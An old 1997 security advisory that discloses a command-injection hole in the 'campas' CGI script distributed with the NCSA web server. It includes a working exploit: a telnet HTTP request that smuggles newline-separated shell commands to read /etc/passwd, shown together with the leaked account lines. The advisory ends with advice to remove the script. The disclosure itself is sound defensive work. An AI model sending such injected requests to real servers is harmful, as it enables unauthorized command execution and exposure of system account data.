campus cgi hole Description: A hole very similar to the standard phf hole alows people to execute arbitrary commands through the campus cgi. Author: Francisco Torres Compromise: Execute arbitrary commands remotely as the owner of the cgi-running process (commonly nobody or daemon). Vulnerable Systems: Those running a vulnerable version of the campus cgi. Version 1.2 is vulnerable. It may be distributed with the NCSA server. Date: 15 July 1997 Date: Tue, 15 Jul 1997 18:24:31 -0500 From: Francisco Torres To: BUGTRAQ@NETSPACE.ORG Subject: Bug CGI campas CAMPAS SECURITY BUG ------------------- ET Lownoise Colombia 1997 CGI: campas #!/bin/sh #pragma ident "@(#)campas.sh 1.2 95/05/24 NCSA" Impact: Execute commands Exploit: > telnet www.xxxx.net 80 Trying 200.xx.xx.xx... Connected to venus.xxxx.net Escape character is '^]'. GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
.... continue :P

Solution: 1-If u dont use it erase it.!
          2-Dont use it again.. (go point 1)

Well another line to put in vito.ini.

ET LOwnoise 1997 Colombia

Addendum(if any):